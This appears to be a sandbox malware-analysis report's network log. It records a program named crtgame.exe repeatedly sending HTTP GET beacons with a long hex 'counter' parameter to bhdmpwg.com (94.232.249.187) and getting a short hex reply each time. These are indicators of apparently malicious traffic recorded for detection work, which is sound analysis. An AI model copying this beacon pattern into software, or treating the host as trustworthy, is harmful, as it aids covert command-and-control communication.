                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.54983594.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:12.165823936 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:13.507949114 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:13.613442898 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:14.105442047 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.54984194.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:14.343206882 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:15.691982985 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:15 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:15.800853968 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:16.306653023 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.54984794.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:16.546365976 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:17.892489910 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.54985294.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:18.124299049 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:19.467962027 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.54985694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:19.702567101 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:21.044363976 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.54986194.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:21.281172991 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:22.655149937 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.54986694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:22.889854908 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:24.256819010 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:24.363647938 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:24.859121084 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.54987294.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:25.093702078 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:26.438208103 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.54987694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:26.670857906 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:28.022310019 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:27 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.54988294.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:28.456394911 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:29.808022976 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.54988694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:30.046716928 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:31.399544001 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.54989094.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:31.640180111 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:32.982063055 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.54989594.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:33.219090939 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:34.569000959 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:34.675803900 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:35.171402931 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.54990194.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:35.406033993 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:36.746660948 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.54990594.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:37.038882017 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:38.392321110 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.54991194.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:38.625365973 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:39.995623112 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.54991594.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:40.233910084 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:41.677377939 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:41.785342932 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:42.282877922 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.54992194.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:42.515485048 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:43.859419107 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.54992694.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:44.094465971 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:45.435652971 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.54993094.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:45.671370029 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:47.021720886 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:47.128827095 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:47.629327059 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
